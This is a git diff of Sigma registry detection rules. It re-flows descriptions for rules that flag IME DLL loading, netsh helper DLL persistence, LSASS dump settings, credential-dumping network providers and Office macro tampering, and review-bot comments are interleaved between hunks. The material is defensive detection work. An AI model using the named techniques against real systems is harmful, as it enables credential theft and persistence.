+ type: derived
 status: experimental
-description: 'Detects usage of Windows Input Method Editor (IME) keyboard layout feature,
- which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST
- message.
-
- Before doing this, the client needs to register the DLL in a special registry
- key that is assumed to implement this keyboard layout. This registry key should
- store a value named "Ime File" with a DLL path.
-
- IMEs are essential for languages that have more characters than can be represented
- on a standard keyboard, such as Chinese, Japanese, and Korean.
-
- '
+description: |
+ Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+ Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+ IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
 references:
 - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/
 author: X__Junior (Nextron Systems)
@@ -38,7 +30,6 @@ detection:
 NewValue|endswith: .ime
 condition: registry_set and (selection and not 1 of filter_main_*)
 falsepositives:
- - IMEs are essential for languages that have more characters than can be represented
- on a standard keyboard, such as Chinese, Japanese, and Korean.
+ - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml b/sigma/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml
index ed9f313bf..83561bc0c 100644
--- a/sigma/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml
@@ -1,21 +1,13 @@
 title: Suspicious Path In Keyboard Layout IME File Registry Value
 id: 9d8f9bb8-01af-4e15-a3a2-349071530530
 related:
- - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1
- type: derived
+ - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1
+ type: derived
 status: experimental
-description: 'Detects usage of Windows Input Method Editor (IME) keyboard layout feature,
- which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST
- message.
-
- Before doing this, the client needs to register the DLL in a special registry
- key that is assumed to implement this keyboard layout. This registry key should
- store a value named "Ime File" with a DLL path.
-
- IMEs are essential for languages that have more characters than can be represented
- on a standard keyboard, such as Chinese, Japanese, and Korean.
-
- '
+description: |
+ Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+ Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+ IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
 references:
 - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/
 author: X__Junior (Nextron Systems)
@@ -43,15 +35,15 @@ detection:
 - \AppData\Roaming\
 - \Temporary Internet
 selection_folders_2:
- - NewValue|contains|all:
- - :\Users\
- - \Favorites\
- - NewValue|contains|all:
- - :\Users\
- - \Favourites\
- - NewValue|contains|all:
- - :\Users\
- - \Contacts\
+ - NewValue|contains|all:
+ - :\Users\
+ - \Favorites\
+ - NewValue|contains|all:
+ - :\Users\
+ - \Favourites\
+ - NewValue|contains|all:
+ - :\Users\
+ - \Contacts\
 condition: registry_set and (selection_registry and 1 of selection_folders_*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml b/sigma/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml
index f3f0593bd..5d5705cfa 100644
--- a/sigma/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml
@@ -1,8 +1,7 @@
 title: New Root or CA or AuthRoot Certificate to Store
 id: d223b46b-5621-4037-88fe-fda32eead684
 status: experimental
-description: Detects the addition of new root, CA or AuthRoot certificates to the
- Windows registry
+description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store
 - https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
diff --git a/sigma/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml b/sigma/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml
index 8fb2a3939..321696ee7 100644
--- a/sigma/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml
@@ -1,11 +1,8 @@
 title: Internet Explorer DisableFirstRunCustomize Enabled
 id: ab567429-1dfb-4674-b6d2-979fd2f9d125
 status: experimental
-description: 'Detects changes to the Internet Explorer "DisableFirstRunCustomize"
- value, which prevents Internet Explorer from running the first run wizard the
- first time a user starts the browser after installing Internet Explorer or Windows.
-
- '
+description: |
+ Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
 references:
 - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
 - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
@@ -25,15 +22,14 @@ detection:
 selection:
 ObjectName|endswith: \Microsoft\Internet Explorer\Main\DisableFirstRunCustomize
 NewValue:
- - DWORD (0x00000001)
- - DWORD (0x00000002)
+ - DWORD (0x00000001) # Home Page
+ - DWORD (0x00000002) # Welcome To IE
 filter_main_generic:
 ProcessName:
 - C:\Windows\explorer.exe
 - C:\Windows\System32\ie4uinit.exe
 condition: registry_set and (selection and not 1 of filter_main_*)
 falsepositives:
- - As this is controlled by group policy as well as user settings. Some false positives
- may occur.
+ - As this is controlled by group policy as well as user settings. Some false positives may occur.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml b/sigma/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml
index 69d006ca5..ff0b317b2 100644
--- a/sigma/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml
@@ -1,9 +1,7 @@
 title: Potential Ransomware Activity Using LegalNotice Message
 id: 8b9606c9-28be-4a38-b146-0e313cc232c1
 status: experimental
-description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry
- values where the message set contains keywords often used in ransomware ransom
- messages
+description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md
 author: frack113
diff --git a/sigma/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml b/sigma/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml
index 1e483c90e..756ecef07 100644
--- a/sigma/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml
@@ -1,13 +1,9 @@
 title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
 id: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d
 status: experimental
-description: 'Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download
- a file from the Internet without executing any
-
- anomalous executables with suspicious arguments. The downloaded file will be in
- C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
-
- '
+description: |
+ Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
+ anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
 author: frack113
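Review bot: The new block-scalar description of the OneDriveStandaloneUpdater rule keeps a line break in the middle of a sentence: `without executing any` ends one line and `anomalous executables with suspicious arguments.` opens the next, so the rendered description reads as two unrelated statements; joining them into one line would match how the other descriptions in this commit were re-flowed. The path on that second line, `...\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json`, also looks as if a separator between the StandaloneUpdater directory and the file name was lost at some point — worth checking against the LOLBAS reference listed under `references` before this text is relied on for triage.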
diff --git a/sigma/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml b/sigma/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml
index 99ed2bbdd..1b3bb8560 100644
--- a/sigma/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml
@@ -1,19 +1,13 @@
 title: RestrictedAdminMode Registry Value Tampering
 id: d6ce7ebd-260b-4323-9768-a9631c8d4db2
 related:
- - id: 28ac00d6-22d9-4a3c-927f-bbd770104573
- type: similar
+ - id: 28ac00d6-22d9-4a3c-927f-bbd770104573 # process_creation
+ type: similar
 status: experimental
-description: 'Detects changes to the "DisableRestrictedAdmin" registry value in order
- to disable or enable RestrictedAdmin mode.
-
- RestrictedAdmin mode prevents the transmission of reusable credentials to the
- remote system to which you connect using Remote Desktop.
-
- This prevents your credentials from being harvested during the initial connection
- process if the remote server has been compromise
-
- '
+description: |
+ Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+ RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+ This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md
 - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx
diff --git a/sigma/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml b/sigma/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml
index e20e2a457..4d65917b6 100644
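Review bot: The re-flowed description of the RestrictedAdminMode rule still ends with `if the remote server has been compromise` and no terminating period; since this hunk rewrites that line anyway, it should become `... if the remote server has been compromised.` in the same pass. The `# process_creation` annotation added to the related id is helpful — it tells a reader which log source the sibling rule covers without opening it — and the other `related` entries this commit re-indents would benefit from the same treatment.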
--- a/sigma/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml
@@ -1,9 +1,7 @@
 title: Lsass Full Dump Request Via DumpType Registry Settings
 id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719
 status: experimental
-description: Detects the setting of the "DumpType" registry value to "2" which stands
- for a "Full Dump". Technique such as LSASS Shtinkering requires this value to
- be "2" in order to dump LSASS.
+description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
 references:
 - https://github.com/deepinstinct/Lsass-Shtinkering
 - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
diff --git a/sigma/builtin/registry/registry_set/registry_set_mal_adwind.yml b/sigma/builtin/registry/registry_set/registry_set_mal_adwind.yml
index 5a7382276..6d388ac3b 100644
--- a/sigma/builtin/registry/registry_set/registry_set_mal_adwind.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_mal_adwind.yml
@@ -1,8 +1,8 @@
 title: Adwind RAT / JRAT - Registry
 id: 42f0e038-767e-4b85-9d96-2c6335bad0b5
 related:
- - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
- type: derived
+ - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
+ type: derived
 status: experimental
 description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
 references:
diff --git a/sigma/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml b/sigma/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml
index 9d350cd47..4f94a3a34 100644
--- a/sigma/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml
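Review bot: The joined description of the DumpType rule carries over a subject/verb mismatch, `Technique such as LSASS Shtinkering requires this value to be "2"`; while the line is being rewritten it should read `Techniques such as LSASS Shtinkering require this value to be "2" in order to dump LSASS.` The rest of the hunk is a pure re-flow and needs no change.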
@@ -1,8 +1,8 @@
 title: Blue Mockingbird - Registry
 id: 92b0b372-a939-44ed-a11b-5136cf680e27
 related:
- - id: c3198a27-23a0-4c2c-af19-e5328d49680e
- type: derived
+ - id: c3198a27-23a0-4c2c-af19-e5328d49680e
+ type: derived
 status: experimental
 description: Attempts to detect system changes made by Blue Mockingbird
 references:
diff --git a/sigma/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml b/sigma/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml
index ad6a5f1e7..db50de5e4 100644
--- a/sigma/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml
@@ -1,17 +1,10 @@
 title: NET NGenAssemblyUsageLog Registry Key Tamper
 id: 28036918-04d3-423d-91c0-55ecf99fb892
 status: experimental
-description: 'Detects changes to the NGenAssemblyUsageLog registry key.
-
- .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog
- CLR configuration knob in the Registry or by configuring an environment variable
- (as described in the next section).
-
- By simplify specifying an arbitrary value (e.g. fake output location or junk data)
- for the expected value, a Usage Log file for the .NET execution context will not
- be created.
-
- '
+description: |
+ Detects changes to the NGenAssemblyUsageLog registry key.
+ .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
+ By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
 references:
 - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/
 author: frack113
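Review bot: Two wording problems survive the re-flow of the NGenAssemblyUsageLog description: `By simplify specifying an arbitrary value` should read `By simply specifying an arbitrary value`, and `(as described in the next section)` points at a section of the cited blog post that does not exist in the rule file, so it should be dropped. Both sentences sit on lines this hunk adds, so fixing them here avoids carrying the copy-paste artifact forward into every downstream rendering of the rule.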
diff --git a/sigma/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml b/sigma/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml
index 816dbe3ab..110f5a6f4 100644
--- a/sigma/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml
@@ -1,16 +1,13 @@
 title: New Netsh Helper DLL Registered From A Suspicious Location
 id: e7b18879-676e-4a0e-ae18-27039185a8e7
 related:
- - id: 56321594-9087-49d9-bf10-524fe8479452
- type: similar
- - id: c90362e0-2df3-4e61-94fe-b37615814cb1
- type: similar
+ - id: 56321594-9087-49d9-bf10-524fe8479452
+ type: similar
+ - id: c90362e0-2df3-4e61-94fe-b37615814cb1
+ type: similar
 status: experimental
-description: 'Detects changes to the Netsh registry key to add a new DLL value that
- is located on a suspicious location. This change might be an indication of a potential
- persistence attempt by adding a malicious Netsh helper
-
- '
+description: |
+ Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
 references:
 - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll
 - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
@@ -36,18 +33,18 @@ detection:
 - \AppData\Local\Temp\
 - \Temporary Internet
 selection_folders_2:
- - NewValue|contains|all:
- - :\Users\
- - \Favorites\
- - NewValue|contains|all:
- - :\Users\
- - \Favourites\
- - NewValue|contains|all:
- - :\Users\
- - \Contacts\
- - NewValue|contains|all:
- - :\Users\
- - \Pictures\
+ - NewValue|contains|all:
+ - :\Users\
+ - \Favorites\
+ - NewValue|contains|all:
+ - :\Users\
+ - \Favourites\
+ - NewValue|contains|all:
+ - :\Users\
+ - \Contacts\
+ - NewValue|contains|all:
+ - :\Users\
+ - \Pictures\
 condition: registry_set and (selection_target and 1 of selection_folders_*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml
index f3daa3b4c..54f218f29 100644
--- a/sigma/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml
@@ -1,16 +1,13 @@
 title: Potential Persistence Via Netsh Helper DLL - Registry
 id: c90362e0-2df3-4e61-94fe-b37615814cb1
 related:
- - id: 56321594-9087-49d9-bf10-524fe8479452
- type: similar
- - id: e7b18879-676e-4a0e-ae18-27039185a8e7
- type: similar
+ - id: 56321594-9087-49d9-bf10-524fe8479452
+ type: similar
+ - id: e7b18879-676e-4a0e-ae18-27039185a8e7
+ type: similar
 status: experimental
-description: 'Detects changes to the Netsh registry key to add a new DLL value. This
- change might be an indication of a potential persistence attempt by adding a malicious
- Netsh helper
-
- '
+description: |
+ Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
 references:
 - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll
 - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
diff --git a/sigma/builtin/registry/registry_set/registry_set_new_application_appcompat.yml b/sigma/builtin/registry/registry_set/registry_set_new_application_appcompat.yml
index c97b520da..41c692d72 100644
--- a/sigma/builtin/registry/registry_set/registry_set_new_application_appcompat.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_new_application_appcompat.yml
@@ -1,8 +1,7 @@
 title: New Application in AppCompat
 id: 60936b49-fca0-4f32-993d-7415edcf9a5d
 status: test
-description: A General detection for a new application in AppCompat. This indicates
- an application executing for the first time on an endpoint.
+description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
 references:
 - https://github.com/OTRF/detection-hackathon-apt29/issues/1
 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md
@@ -23,8 +22,7 @@ detection:
 ObjectName|contains: \AppCompatFlags\Compatibility Assistant\Store\
 condition: registry_set and selection
 falsepositives:
- - This rule is to explore new applications on an endpoint. False positives depends
- on the organization.
+ - This rule is to explore new applications on an endpoint. False positives depends on the organization.
 - Newly setup system.
 - Legitimate installation of new application.
 level: informational
diff --git a/sigma/builtin/registry/registry_set/registry_set_new_network_provider.yml b/sigma/builtin/registry/registry_set/registry_set_new_network_provider.yml
index 8da2b65bf..d51aa9785 100644
--- a/sigma/builtin/registry/registry_set/registry_set_new_network_provider.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_new_network_provider.yml
@@ -1,11 +1,10 @@
 title: Potential Credential Dumping Attempt Using New NetworkProvider - REG
 id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701
 related:
- - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77
- type: similar
+ - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77
+ type: similar
 status: experimental
-description: Detects when an attacker tries to add a new network provider in order
- to dump clear text credentials, similar to how the NPPSpy tool does it
+description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
 references:
 - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade
 - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
diff --git a/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml b/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml
index 7b38c87a8..029c71b1d 100644
--- a/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml
@@ -30,8 +30,7 @@ detection:
 ObjectName|contains: \Microsoft Excel Driver
 NewValue|startswith: C:\Progra
 NewValue|endswith: \ACEODBC.DLL
- condition: registry_set and (selection and not 1 of filter_main_* and not 1 of
- filter_optional_*)
+ condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
 falsepositives:
 - Likely
 level: low
diff --git a/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml b/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml
index 6f7921704..a91b935e9 100644
--- a/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml
@@ -1,8 +1,7 @@
 title: Potentially Suspicious ODBC Driver Registered
 id: e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4
 status: experimental
-description: Detects the registration of a new ODBC driver where the driver is located
- in a potentially suspicious location
+description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
 references:
 - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
 author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml
index 7c266350c..be91c454e 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml
@@ -1,12 +1,10 @@
 title: Trust Access Disable For VBApplications
 id: 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf
 related:
- - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
- type: obsoletes
+ - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
+ type: obsoletes
 status: test
-description: Detects registry changes to Microsoft Office "AccessVBOM" to a value
- of "1" which disables trust access for VBA on the victim machine and lets attackers
- execute malicious macros without any Microsoft Office warnings.
+description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
 references:
 - https://twitter.com/inversecos/status/1494174785621819397
 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml b/sigma/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml
index 2b0a8579e..bdc3d55d7 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml
@@ -1,11 +1,10 @@
 title: Microsoft Office Protected View Disabled
 id: a5c7a43f-6009-4a8c-80c5-32abf1c53ecc
 related:
- - id: 7c637634-c95d-4bbf-b26c-a82510874b34
- type: obsoletes
+ - id: 7c637634-c95d-4bbf-b26c-a82510874b34
+ type: obsoletes
 status: test
-description: Detects changes to Microsoft Office protected view registry keys with
- which the attacker disables this feature.
+description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
 - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_enable_dde.yml b/sigma/builtin/registry/registry_set/registry_set_office_enable_dde.yml
index 0e3bc97f7..164f19d4b 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_enable_dde.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_enable_dde.yml
@@ -1,8 +1,7 @@
 title: Enable Microsoft Dynamic Data Exchange
 id: 63647769-326d-4dde-a419-b925cc0caf42
 status: test
-description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions
- of Microsoft Word or Excel.
+description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
 references:
 - https://msrc.microsoft.com/update-guide/vulnerability/ADV170021
 author: frack113
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml
index 045531046..f53798c9b 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml
@@ -1,8 +1,7 @@
 title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
 id: 396ae3eb-4174-4b9b-880e-dc0364d78a19
 status: experimental
-description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot"
- which if enabled allows the automatic loading of any configured VBA project/module
+description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53
 - https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml
index 08751290a..8c1c3bf74 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml
@@ -1,8 +1,7 @@
 title: Outlook Macro Execution Without Warning Setting Enabled
 id: e3b50fa5-3c3f-444e-937b-0a99d33731cd
 status: test
-description: Detects the modification of Outlook security setting to allow unprompted
- execution of macros.
+description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
 references:
 - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/
 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml
index a9fdbf008..2ab1850cc 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml
@@ -1,13 +1,12 @@
 title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
 id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08
 related:
- - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a
- type: similar
- - id: 55f0a3a1-846e-40eb-8273-677371b8d912
- type: similar
+ - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a
+ type: similar
+ - id: 55f0a3a1-846e-40eb-8273-677371b8d912 # ProcCreation variation
+ type: similar
 status: experimental
-description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules"
- which allows outlook to run applications or execute macros
+description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
 references:
 - https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048
 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml b/sigma/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml
index a4a168bc8..dbfaac982 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml
@@ -1,8 +1,8 @@
 title: Outlook Security Settings Updated - Registry
 id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a
 related:
- - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
- type: similar
+ - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd # EnableUnsafeClientMailRules
+ type: similar
 status: test
 description: Detects changes to the registry values related to outlook security settings
 references:
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml b/sigma/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml
index 52115ac6c..66e6846e2 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml
@@ -1,11 +1,10 @@
 title: Macro Enabled In A Potentially Suspicious Document
 id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
 related:
- - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2
- type: derived
+ - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2
+ type: derived
 status: experimental
-description: Detects registry changes to Office trust records where the path is located
- in a potentially suspicious location
+description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
 references:
 - https://twitter.com/inversecos/status/1494174785621819397
